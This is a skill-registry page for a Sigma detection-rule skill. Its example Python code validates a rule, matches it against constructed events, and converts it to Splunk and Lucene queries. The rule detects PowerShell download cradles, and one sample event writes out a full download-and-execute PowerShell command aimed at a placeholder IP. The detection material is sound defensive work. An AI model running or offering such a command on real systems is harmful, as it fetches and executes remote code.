
detection-sigma

majiayu000
Updated 7 days ago
Category: Other
Tags: sigma, detection, siem, threat-hunting, mitre-attack, detection-engineering, log-analysis

About

This skill enables creation and management of vendor-agnostic SIEM detection rules in the Sigma format. Rules are written once and converted into the native query languages of platforms such as Splunk, Elastic, QRadar, and Sentinel, which supports threat hunting and detection-as-code workflows. Use it for standardized security monitoring, MITRE ATT&CK mapping, and cross-platform rule portability.
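To make the "write once, convert everywhere" idea concrete, here is an added example (not code from the detection-sigma skill or the registry) of what a Sigma rule looks like in parsed form and what a converter has to do with it: validate the rule's required fields and its ATT&CK tags, run the detection logic over a few constructed process-creation events, and render the same logic as a Splunk search and as an Elasticsearch Lucene query string. The rule, the events, the `sccm_agent.exe` parent-process filter and the `198.51.100.7` URL are all constructed for illustration; the converter is a deliberately small subset of the Sigma specification written for this page, not pySigma or sigma-cli.

```python
"""Sigma-style rule toolkit (example code for this page, not the detection-sigma skill's own):
validate a rule, run its detection over events, render it as Splunk SPL or Lucene. Covers a
subset of Sigma: field maps, value lists, contains/startswith/endswith/all modifiers, wildcards."""
import fnmatch
import re

# Parsed form of a Sigma YAML rule, constructed for this example. Within a selection the
# fields are ANDed and a list of values is ORed; the filter's parent process is hypothetical.
RULE = {
    "title": "Suspicious PowerShell Download Cradle",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection": {
            "Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
            "CommandLine|contains": ["DownloadString", "Invoke-Expression", "IEX"],
        },
        "filter": {"ParentImage|endswith": "\\sccm_agent.exe"},
        "condition": "selection and not filter",
    },
    "tags": ["attack.execution", "attack.t1059.001"],
}
# Constructed sample process-creation events, not real telemetry.
EVENTS = [
    {"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -nop -c IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe"},
    {"Image": "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "CommandLine": "pwsh -c IEX (DownloadString)",
     "ParentImage": "C:\\Program Files\\Agent\\sccm_agent.exe"},  # matches selection, suppressed by filter
    {"Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe report.txt",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]
MODIFIERS = ("contains", "startswith", "endswith")
OPERATORS = ("and", "or", "not", "(", ")")
ATTACK_TAG = re.compile(r"^attack\.(t\d{4}(\.\d{3})?|[a-z_-]+)$")
COND_TOKEN = re.compile(r"\(|\)|\band\b|\bor\b|\bnot\b|[A-Za-z_]\w*")

def validate_rule(rule):
    """Return a list of problems; an empty list means the rule is well-formed."""
    problems = [f"missing required field: {k}" for k in ("title", "logsource", "detection") if k not in rule]
    det = rule.get("detection", {})
    if "condition" not in det:
        problems.append("detection.condition is required")
    else:
        problems += [f"condition references unknown selection: {t}" for t in COND_TOKEN.findall(det["condition"])
                     if t not in OPERATORS and t not in det]
    problems += [f"tag is not attack.<tactic> or attack.t<id>: {t}" for t in rule.get("tags", []) if not ATTACK_TAG.match(t)]
    return problems

def _split_key(key):
    """'CommandLine|contains|all' -> ('CommandLine', 'contains', True)."""
    field, *mods = key.split("|")
    return field, next((m for m in mods if m in MODIFIERS), None), "all" in mods

def _value_matches(actual, pattern, modifier):
    a, p = str(actual).lower(), str(pattern).lower()  # Sigma string matching is case-insensitive
    if modifier in MODIFIERS:
        return {"contains": p in a, "startswith": a.startswith(p), "endswith": a.endswith(p)}[modifier]
    return fnmatch.fnmatchcase(a, p)  # plain values may carry * and ? wildcards

def _selection_matches(selection, event):
    for key, expected in selection.items():
        field, modifier, need_all = _split_key(key)
        values = expected if isinstance(expected, list) else [expected]
        hits = [field in event and _value_matches(event[field], v, modifier) for v in values]
        if not (all(hits) if need_all else any(hits)):
            return False
    return True

def match_event(rule, event):
    """True if the event satisfies the rule's condition. Every condition token is whitelisted
    before the expression reaches eval, so only booleans and operators get evaluated."""
    cond = rule["detection"]["condition"]
    tokens = COND_TOKEN.findall(cond)
    if "".join(tokens) != re.sub(r"\s+", "", cond):
        raise ValueError(f"unsupported condition syntax: {cond!r}")
    expr = " ".join(t if t in OPERATORS else str(_selection_matches(rule["detection"][t], event)) for t in tokens)
    return bool(eval(expr, {"__builtins__": {}}, {}))

def _term(field, value, modifier, backend):
    if backend == "splunk":
        v = str(value).replace("\\", "\\\\").replace('"', '\\"')
    else:  # lucene: escape reserved characters, keep * and ? as wildcards
        v = re.sub(r'([\\+\-!(){}\[\]^"~:/ ])', r"\\\1", str(value))
    v = {"contains": f"*{v}*", "startswith": f"{v}*", "endswith": f"*{v}"}.get(modifier, v)
    return f'{field}="{v}"' if backend == "splunk" else f"{field}:{v}"

def convert(rule, backend):
    """Render each selection as a parenthesised clause, then substitute the clauses into the
    condition with uppercase operators. backend is 'splunk' or 'lucene'."""
    det, clauses = rule["detection"], {}
    for name, sel in det.items():
        if name == "condition":
            continue
        parts = []
        for key, expected in sel.items():
            field, modifier, need_all = _split_key(key)
            terms = [_term(field, v, modifier, backend) for v in (expected if isinstance(expected, list) else [expected])]
            parts.append(terms[0] if len(terms) == 1 else "(" + (" AND " if need_all else " OR ").join(terms) + ")")
        clauses[name] = "(" + " AND ".join(parts) + ")"
    return " ".join({"and": "AND", "or": "OR", "not": "NOT"}.get(t, clauses.get(t, t))
                    for t in COND_TOKEN.findall(det["condition"]))
```

Running `match_event(RULE, e)` over `EVENTS` yields `[True, False, False]`: the second event is a real download cradle by the selection's standards but is suppressed by the `filter`, which is exactly the kind of allow-list that tuning a production rule consists of and the reason Sigma keeps filters as named selections rather than baking them into the query. `convert(RULE, "splunk")` and `convert(RULE, "lucene")` produce the same boolean structure in two query dialects, which is the portability the skill description refers to. In practice the conversion is done by sigma-cli with a backend and a field-mapping pipeline for the target platform; this toy has no pipeline step, so field names such as `Image` are emitted as-is and would need mapping for most real indices.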

Quick Install

Claude Code (recommended):
npx skills add majiayu000/claude-skill-registry -a claude-code

Plugin command (alternative):
/plugin add https://github.com/majiayu000/claude-skill-registry

Git clone (alternative):
git clone https://github.com/majiayu000/claude-skill-registry.git ~/.claude/skills/detection-sigma

Copy and paste one of these commands into Claude Code (the git clone into a shell) to install this skill.

GitHub Repository

majiayu000/claude-skill-registry
Path: skills/data/detection-sigma

Related Skills

ir-velociraptor (category: Other)

This skill enables large-scale endpoint forensics and incident response using Velociraptor Query Language (VQL). It's designed for collecting evidence, hunting threats, and performing live response across multiple systems. Developers can use it to gather telemetry, monitor security events, and create custom forensic artifacts for investigations.

forensics-osquery (category: Other)

This skill enables SQL-based forensic investigation and threat hunting by querying endpoint operating systems as relational databases via osquery. It's designed for rapid evidence collection, incident response, and analyzing system artifacts like processes, network connections, and file hashes across Linux, macOS, and Windows. Use it for live forensics, building detection queries, and hunting for compromise indicators during security incidents.

layout-analyzer (category: Documentation)

The layout-analyzer skill uses the surya library to detect document structure elements like text blocks, tables, and reading order from images or PDFs. Developers should use it when they need programmatic analysis of complex document layouts for processing or extraction tasks. It supports detection of various regions including headings and figures, and determines the proper reading sequence.